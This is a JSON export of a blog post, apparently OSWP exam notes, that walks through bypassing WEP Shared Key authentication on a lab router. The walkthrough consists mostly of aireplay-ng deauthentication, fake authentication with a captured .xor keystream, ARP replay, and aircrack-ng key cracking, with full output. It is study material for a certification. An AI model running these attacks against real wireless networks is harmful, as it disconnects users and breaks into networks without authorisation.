{"id":1080,"date":"2021-05-12T15:13:50","date_gmt":"2021-05-12T15:13:50","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1080"},"modified":"2021-05-12T15:13:50","modified_gmt":"2021-05-12T15:13:50","slug":"shared-key-nedir","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/12\/shared-key-nedir\/","title":{"rendered":"What Is Shared Key?"},"content":{"rendered":"<p>While preparing for the OSWP exam I try to produce resources for people who know nothing about the subject; sometimes I cover topics too quickly or skip them altogether because the technologies are obsolete. Shared key, for example... I had some time and I am taking the exam in a few days, so I decided to write it up...<\/p>\n<p>We already know Open Authentication. It lives up to its name, because we really do end up able to communicate with the AP without any verification mechanism at all. This in turn gives us the opportunity to easily perform packet injection on a network configured with WEP and Open authentication.<br \/>\nShared Key comes into play at exactly this point in the story. It tries to verify you before letting you talk to the AP. It sends you a challenge request, and you encrypt the data in that request with the correct key and send it back as the response. If the AP verifies it, it starts talking to you. Looks great, doesn't it? But again, we can bypass it very easily.<\/p>\n<p>On a network configured with Shared Key, let's first try a fake authentication attack. 
We get output similar to the following.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# airodump-ng wlan0 --bssid 7A:2B:C1:63:BD:64 -c 1 -w shared\n10:59:10  Created capture file &quot;shared-01.cap&quot;.\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -1 0 -e Huawei_HG655d -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0\n11:00:45  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\n\n11:00:45  Sending Authentication Request (Open System) [ACK]\n11:00:45  Switching to shared key authentication\n^Cad 25 packets....\n<\/code><\/pre>\n<p>Now let's run a deauthentication attack while capturing with airodump-ng. When a client on the network reconnects, we will obtain the XOR file from it, and with this file we will be able to build a response to the challenge request.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0\n11:04:38  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nNB: this attack is more effective when targeting\na connected wireless client (-c &lt;client&#039;s mac&gt;).\n11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:39  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:40  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:41  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:42  Sending DeAuth (code 
7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:43  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:04:44  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# ls\nshared-01-7A-2B-C1-63-BD-64.xor  shared-01.csv         shared-01.kismet.netxml\nshared-01.cap                    shared-01.kismet.csv  shared-01.log.csv\n<\/code><\/pre>\n<p>As seen above, the .xor file was obtained. Now let's perform the fake authentication attack using this file.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -1 600 -e Huawei_HG655d  -y shared-01-7A-2B-C1-63-BD-64.xor -a 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0\nThe interface MAC (96:B5:61:AD:E1:1A) doesn&#039;t match the specified MAC (-h).\n    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D\n11:07:15  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\n\n11:07:15  Sending Authentication Request (Shared Key)\n\n11:07:17  Sending Authentication Request (Shared Key) [ACK]\n11:07:17  Authentication 1\/2 successful\n11:07:17  Sending encrypted challenge. [ACK]\n11:07:17  Authentication 2\/2 successful\n11:07:17  Sending Association Request [ACK]\n11:07:17  Association successful :-) (AID: 1)\n\n...<\/code><\/pre>\n<p>Great! Next up are ARP-REPLAY and aircrack-ng. 
To make things easier, if we also run a deauthentication attack during the ARP replay, we can capture an ARP packet more quickly.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -3 -b 7A:2B:C1:63:BD:64 -h 3a:bd:12:90:30:0d wlan0                                             130 \u2a2f\nThe interface MAC (96:B5:61:AD:E1:1A) doesn&#039;t match the specified MAC (-h).\n    ifconfig wlan0 hw ether 3A:BD:12:90:30:0D\n11:09:10  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nSaving ARP requests in replay_arp-0512-110910.cap\nYou should also start airodump-ng to capture replies.\n^Cad 114438 packets (got 37470 ARP requests and 21755 ACKs), sent 33309 packets...(499 pps)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aireplay-ng -0 10 -a 7A:2B:C1:63:BD:64 wlan0 \n11:09:13  Waiting for beacon frame (BSSID: 7A:2B:C1:63:BD:64) on channel 1\nNB: this attack is more effective when targeting\na connected wireless client (-c &lt;client&#039;s mac&gt;).\n11:09:13  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:14  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:15  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:16  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:17  Sending DeAuth (code 7) to broadcast -- BSSID: [7A:2B:C1:63:BD:64]\n11:09:18  Sending DeAuth (code 7) to broadcast -- BSSID: 
[7A:2B:C1:63:BD:64]\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n CH  1 ][ Elapsed: 6 mins ][ 2021-05-12 11:11 ][ interface wlan0 down \n\n BSSID              PWR RXQ  Beacons    #Data, #\/s  CH   MB   ENC CIPHER  AUTH ESSID\n\n 7A:2B:C1:63:BD:64  -38 100     3424    22693    0   1   54e. WEP  WEP    SKA  Huawei_HG655d                        \n\n BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes\n\n 7A:2B:C1:63:BD:64  18:28:61:28:F8:70  -18   54e-54e     0    13447                                                  \n 7A:2B:C1:63:BD:64  3A:BD:12:90:30:0D  -38    0 - 1      0    65725                                                  \nQuitting...\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oswp\/shared]\n\u2514\u2500# aircrack-ng shared-01.cap                                 \nReading packets, please wait...\nOpening shared-01.cap\nRead 188762 packets.\n                                            Got 22697 out of 20000 IVsStarting PTW attack with 22697 ivs.\n   #  BSSID              ESSID                     Encryption\n\n   1  7A:2B:C1:63:BD:64  Huawei_HG655d             WEP (22697 IVs)\n\nChoosing first network as target.\n\nReading packets, please wait...\nOpening shared-01.cap\nRead 188762 packets.\n\n1 potential targets\n\nAttack will be restarted every 5000 captured ivs.\n\n                                                 Aircrack-ng 1.6 \n\n                                   [00:00:01] Tested 71432 keys (got 22393 IVs)\n\n   KB    depth   byte(vote)\n    0    0\/  1   00(36352) C8(28928) E3(27904) BA(27648) 0A(27392) B8(27392) 61(26880) 8D(26880) \n    1   14\/ 16   D9(26368) 00(26112) 16(26112) 9F(26112) FC(26112) 30(25856) 48(25856) 79(25856) \n    2    0\/  2   00(32768) FB(28416) 56(28160) 97(27904) B2(27904) F6(27904) 81(27648) 20(27392) \n    3    2\/ 58   00(28160) D2(28160) CA(27904) 19(27904) 01(27648) 3A(27392) 4A(27392) 56(27392) \n    4    8\/ 41   
00(26880) 04(26624) 1E(26624) CF(26368) FA(26112) 69(26112) 85(26112) C8(26112) \n\n                     KEY FOUND! [ 00:00:00:00:00 ] (ASCII: ..... )\n    Decrypted correctly: 100%\n<\/code><\/pre>\n<p>So the network password turns out to be 0000000000...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>While preparing for the OSWP exam I try to produce resources for people who know nothing about the subject; sometimes I cover topics too quickly or skip them altogether because the technologies are obsolete. Shared key, for example&#8230;&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/12\/shared-key-nedir\/\">Continue reading<span class=\"screen-reader-text\">What Is Shared Key?<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[382],"tags":[496],"class_list":["post-1080","post","type-post","status-publish","format-standard","hentry","category-wireless","tag-shared-key","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1080"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080\/revisions"}],"predecessor-version":[{"id":1081,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1080\/revisions\/1081"}],"wp:attachment":[{"href":"https:\/\/berenk
udaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}